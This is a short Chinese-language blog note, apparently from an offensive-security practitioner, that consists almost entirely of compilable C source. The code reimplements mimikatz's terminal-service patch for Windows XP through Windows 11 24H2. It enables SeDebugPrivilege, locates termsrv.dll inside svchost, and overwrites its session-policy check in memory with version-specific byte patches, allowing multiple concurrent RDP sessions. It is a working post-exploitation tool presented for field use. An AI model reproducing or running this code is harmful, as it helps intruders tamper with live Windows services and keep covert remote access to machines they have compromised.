mimikatz termservice patch

前言：实战中碰到了，这边记录下mimikatz termservice patch笔记，支持W11_24H2的机器

#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <psapi.h>
 
 
typedef struct _MEMORY_SEARCH {
    MEMORY_BASIC_INFORMATION mbi;
    SIZE_T size;
} MEMORY_SEARCH, *PMEMORY_SEARCH;
 
typedef struct _PATCH_PATTERN {
    DWORD Length;
    BYTE *Pattern;
} PATCH_PATTERN, *PPATCH_PATTERN;
 
typedef struct _PATCH_OFFSETS {
    LONG off0;
} PATCH_OFFSETS, *PPATCH_OFFSETS;
 
typedef struct _PATCH_GENERIC {
    DWORD MinBuildNumber;
    PATCH_PATTERN Search;
    PATCH_PATTERN Patch;
    PATCH_OFFSETS Offsets;
} PATCH_GENERIC, *PPATCH_GENERIC;
 
typedef struct _dll_info
{
    int pid;
    byte * dll_addr;
    int dll_size;
} dll_info;
 
BYTE PTRN_WN60_Query__CDefPolicy[] = {0x8b, 0x81, 0x38, 0x06, 0x00, 0x00, 0x39, 0x81, 0x3c, 0x06, 0x00, 0x00, 0x75};
BYTE PTRN_WN6x_Query__CDefPolicy[] = {0x39, 0x87, 0x3c, 0x06, 0x00, 0x00, 0x0f, 0x84};
BYTE PTRN_WN81_Query__CDefPolicy[] = {0x39, 0x81, 0x3c, 0x06, 0x00, 0x00, 0x0f, 0x84};
BYTE PTRN_W10_1803_Query__CDefPolicy[] = {0x8b, 0x99, 0x3c, 0x06, 0x00, 0x00, 0x8b, 0xb9, 0x38, 0x06, 0x00, 0x00, 0x3b, 0xdf, 0x0f, 0x84};
BYTE PTRN_W10_1809_Query__CDefPolicy[] = {0x8b, 0x81, 0x38, 0x06, 0x00, 0x00, 0x39, 0x81, 0x3c, 0x06, 0x00, 0x00, 0x0f, 0x84};
BYTE PTRN_W11_24H2[] =                   {0x8B, 0x81, 0x38, 0x06, 0x00, 0x00, 0x39, 0x81, 0x3C, 0x06, 0x00, 0x00, 0x75};
BYTE PATC_WN60_Query__CDefPolicy[] = {0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90, 0xeb};
BYTE PATC_WN6x_Query__CDefPolicy[] = {0xc7, 0x87, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90};
BYTE PATC_WN81_Query__CDefPolicy[] = {0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90};
BYTE PATC_W10_1803_Query__CDefPolicy[] = {0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90, 0x90, 0x90, 0x90, 0xe9};
BYTE PATC_W10_1809_Query__CDefPolicy[] = {0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
BYTE PATC_W11_23H2[] = {0xB8, 0x00, 0x01, 0x00, 0x00, 0x89, 0x81, 0x38, 0x06, 0x00, 0x00, 0x90};
BYTE PATC_W11_24H2[] = {0xB8, 0x00, 0x01, 0x00, 0x00, 0x89, 0x81, 0x38, 0x06, 0x00, 0x00, 0x90, 0xEB};
 
BYTE PTRN_WIN5_TestLicence[]		= {0x83, 0xf8, 0x02, 0x7f};
BYTE PATC_WIN5_TestLicence[]		= {0x90, 0x90};
 
PATCH_GENERIC TermSrvMultiRdpReferences[] = {
    {2600/*Win XP*/, {sizeof(PTRN_WIN5_TestLicence),PTRN_WIN5_TestLicence},{sizeof(PATC_WIN5_TestLicence),	PATC_WIN5_TestLicence},{3}},
    {6000/*VISTA*/, {sizeof(PTRN_WN60_Query__CDefPolicy), PTRN_WN60_Query__CDefPolicy}, {sizeof(PATC_WN60_Query__CDefPolicy), PATC_WN60_Query__CDefPolicy}, {0}},
    {7600/*Win_7*/, {sizeof(PTRN_WN6x_Query__CDefPolicy), PTRN_WN6x_Query__CDefPolicy}, {sizeof(PATC_WN6x_Query__CDefPolicy), PATC_WN6x_Query__CDefPolicy}, {0}},
    {9600/*Win8*/, {sizeof(PTRN_WN81_Query__CDefPolicy), PTRN_WN81_Query__CDefPolicy}, {sizeof(PATC_WN81_Query__CDefPolicy), PATC_WN81_Query__CDefPolicy}, {0}},
    {17134/*Win_10_1803*/, {sizeof(PTRN_W10_1803_Query__CDefPolicy), PTRN_W10_1803_Query__CDefPolicy}, {sizeof(PATC_W10_1803_Query__CDefPolicy), PATC_W10_1803_Query__CDefPolicy}, {0}},
    {17763/*Win_10_1803*/, {sizeof(PTRN_W10_1809_Query__CDefPolicy), PTRN_W10_1809_Query__CDefPolicy}, {sizeof(PATC_W10_1809_Query__CDefPolicy), PATC_W10_1809_Query__CDefPolicy}, {0}},
    {22631/*Win_11_23H2*/, {sizeof(PTRN_W11_24H2), PTRN_W11_24H2}, {sizeof(PATC_W11_23H2), PATC_W11_23H2}, {0}},
    {26100/*Win_11_24H2*/, {sizeof(PTRN_W11_24H2), PTRN_W11_24H2}, {sizeof(PATC_W11_24H2), PATC_W11_24H2}, {0}},
};
 
BOOL PatchMemory(HANDLE hProcess, LPVOID lpBaseAddress, SIZE_T region_size, BYTE *pattern, SIZE_T patternSize, BYTE *patch, SIZE_T patchSize, LONG offset) {
    BYTE *buffer = (BYTE *)malloc(region_size);
    SIZE_T bytesRead;
    BOOL result = FALSE;
 
    // print pattern to search for
    printf("[*] Pattern to search for: ");
    for (int i = 0; i < patternSize; i++)
    {
        printf("%02x ", pattern[i]);
    }
    printf("\r\n");
 
    if (ReadProcessMemory(hProcess, lpBaseAddress, buffer, region_size, &bytesRead) && bytesRead == region_size) {
        printf("[+] Read %zu bytes from process\n", bytesRead);
 
        // write buffer into file C:\temp\buffer.dmp, just for debugging/Checking new offsets
        /*
        FILE *f = fopen("C:\\temp\\buffer.dmp", "wb");
        if (f) {
            fwrite(buffer, 1, bytesRead, f);
            fclose(f);
            printf("Wrote process memory to C:\\temp\\buffer.dmp\n");
        } else {
            printf("Failed to write process memory to C:\\temp\\buffer.dmp\n");
        }
        */
 
        for (SIZE_T i = 0; i <= region_size - patternSize; i++) {
            if (memcmp(buffer + i, pattern, patternSize) == 0) {
                printf("[+] Found pattern in process memory at offset %zu\n", i);
                DWORD oldProtect;
                if (VirtualProtectEx(hProcess, (LPVOID)((BYTE *)lpBaseAddress + i + offset), patchSize, PAGE_EXECUTE_READWRITE, &oldProtect)) {
                    printf("[+] Patched memory permissions\n");
                    SIZE_T bytesWritten;
                    if (WriteProcessMemory(hProcess, (LPVOID)((BYTE *)lpBaseAddress + i + offset), patch, patchSize, &bytesWritten) && bytesWritten == patchSize) {
                        printf("[+] Patched process memory\n");
                        result = TRUE;
                    }
                    VirtualProtectEx(hProcess, (LPVOID)((BYTE *)lpBaseAddress + i + offset), patchSize, oldProtect, &oldProtect);
                    printf("[+] Restored memory permissions\n");
                }
                break; // Exit the loop after patching
            }
        }
    }
 
    free(buffer);
    return result;
}
 
PATCH_GENERIC *GetPatchGenericFromBuild(PATCH_GENERIC *generics, SIZE_T cbGenerics, DWORD buildNumber) {
    PATCH_GENERIC *bestMatch = NULL;
    for (SIZE_T i = 0; i < cbGenerics; i++) {
        if (generics[i].MinBuildNumber <= buildNumber) {
            if (bestMatch == NULL || generics[i].MinBuildNumber > bestMatch->MinBuildNumber) {
                bestMatch = &generics[i];
            }
        }
    }
    return bestMatch;
}
 
 
dll_info * get_dll_info(char * dll_name, BOOL verbose)
{
     dll_info * dll;
     dll = malloc(sizeof(dll_info)); 
     HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
     if( hProcessSnap == INVALID_HANDLE_VALUE )
     {
         printf("[-] error CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, ...)\n");
         return;
     }
     PROCESSENTRY32 pe32;
     pe32.dwSize = sizeof(PROCESSENTRY32);
     if(! Process32First(hProcessSnap, &pe32) )
     {
          printf("[-] error Process32First()\n");
          return;
     }
     do
     {
         if(! strcmp("svchost.exe", pe32.szExeFile) )
         {
             if(verbose)
                 printf("%s [%d]\n", pe32.szExeFile, pe32.th32ProcessID);
             HANDLE hModuleSnap = CreateToolhelp32Snapshot( TH32CS_SNAPMODULE, pe32.th32ProcessID );
             if( hModuleSnap == INVALID_HANDLE_VALUE )
             {
                 printf("[-] error CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, %d)\n", pe32.th32ProcessID);
                 continue;
             }
             MODULEENTRY32 me32;
             me32.dwSize = sizeof(MODULEENTRY32);
             if(! Module32First(hModuleSnap, &me32) )
             {
                 printf("[-] error Module32First()\n");
                 continue;
             }
             do
             {
                 if(verbose)
                     printf("  [0x%08x]\t%s (%d B)\n", me32.modBaseAddr, me32.szModule, me32.modBaseSize);
                 if(! strcmp( dll_name, me32.szModule ) )
                 {
                     dll->pid = pe32.th32ProcessID;
                     dll->dll_addr = me32.modBaseAddr;
                     dll->dll_size = me32.modBaseSize;
                     CloseHandle(hModuleSnap);
                     return dll;
                 }
             }
             while( Module32Next(hModuleSnap, &me32) );
             CloseHandle(hModuleSnap);
         }
     }
     while( Process32Next(hProcessSnap, &pe32) );
     return 0;
}
 
typedef LONG (WINAPI *RtlGetVersionPtr)(PRTL_OSVERSIONINFOW);
 
int GetWindowsBuildNumber() {
    HMODULE hMod = GetModuleHandleW(L"ntdll.dll");
    if (hMod) {
        RtlGetVersionPtr pRtlGetVersion = (RtlGetVersionPtr)GetProcAddress(hMod, "RtlGetVersion");
        if (pRtlGetVersion) {
            RTL_OSVERSIONINFOW rovi = {0};
            rovi.dwOSVersionInfoSize = sizeof(rovi);
            if (pRtlGetVersion(&rovi) == 0) {
                return rovi.dwBuildNumber;
            }
        }
    }
    return -1; // Return -1 if retrieval fails
}
BOOL PatchTermService(PATCH_GENERIC *generics, SIZE_T cbGenerics, PCWSTR moduleName) {
    BOOL result = FALSE;
    DWORD buildNumber = GetWindowsBuildNumber(); // Example build number, replace with actual build number retrieval
    printf("[*] Windows build number: %lu\n", buildNumber);
    PATCH_GENERIC *currentReferences = GetPatchGenericFromBuild(generics, cbGenerics, buildNumber);
 
    if (currentReferences) {
        printf("[*] Found patch references for build number %lu\n", buildNumber);
 
        SERVICE_STATUS_PROCESS serviceStatusProcess;
        dll_info * termsrv = get_dll_info( "termsrv.dll", FALSE );
        DWORD processId = termsrv->pid;
        printf("[+] Found TermService with PID %lu\n", processId);
 
        HANDLE hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION, FALSE, processId);
        if (hProcess) {
                printf("[+] Opened process with PID %lu\n", processId);
 
                LPVOID baseAddress = termsrv->dll_addr;
                SIZE_T imageSize = termsrv->dll_size;
                printf("[*] Module base address: %p, size: %zu\n", baseAddress, imageSize);
 
                MEMORY_BASIC_INFORMATION mbi;
                for (LPBYTE address = (LPBYTE)baseAddress; address < (LPBYTE)baseAddress + imageSize; address += mbi.RegionSize) {
                    if (VirtualQueryEx(hProcess, address, &mbi, sizeof(mbi)) == sizeof(mbi)) {
                        if (mbi.State == MEM_COMMIT && (mbi.Protect == PAGE_EXECUTE_READ || mbi.Protect == PAGE_EXECUTE_READWRITE)) {
                            printf("[*] Checking memory region at address %p, size: %zu\n", address, mbi.RegionSize);
                            if (PatchMemory(hProcess, address,mbi.RegionSize, currentReferences->Search.Pattern, currentReferences->Search.Length, currentReferences->Patch.Pattern, currentReferences->Patch.Length, currentReferences->Offsets.off0)) {
                                printf("[+] \"%ls\" service patched at address %p\n", moduleName, address);
                                result = TRUE;
                                break;
                            }
                        }
                    } else {
                        printf("[-] VirtualQueryEx failed at address %p with error %lu\n", address, GetLastError());
                    }
                }
                    
                CloseHandle(hProcess);
            } else {
                printf("OpenProcess failed with error %lu\n", GetLastError());
            }
 
    } else {
        printf("No patch references found for build number %lu\n", buildNumber);
    }
 
    return result;
}
 
 
void get_privileges()
{
     HANDLE hProcessToken;
     LUID luid;
     TOKEN_PRIVILEGES priv;
     OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hProcessToken);
     LookupPrivilegeValue(NULL, "SeDebugPrivilege", &luid);
     priv.PrivilegeCount = 1;
     priv.Privileges[0].Luid = luid;
     priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
     AdjustTokenPrivileges( hProcessToken, FALSE, &priv, sizeof(TOKEN_PRIVILEGES), 0, 0 );
}
 
// main function
int main() {
    get_privileges();
    if (!PatchTermService(TermSrvMultiRdpReferences, ARRAYSIZE(TermSrvMultiRdpReferences), L"termsrv.dll")) {
        printf("[-] Failed to patch service\n");
    }
 
    return 0;
}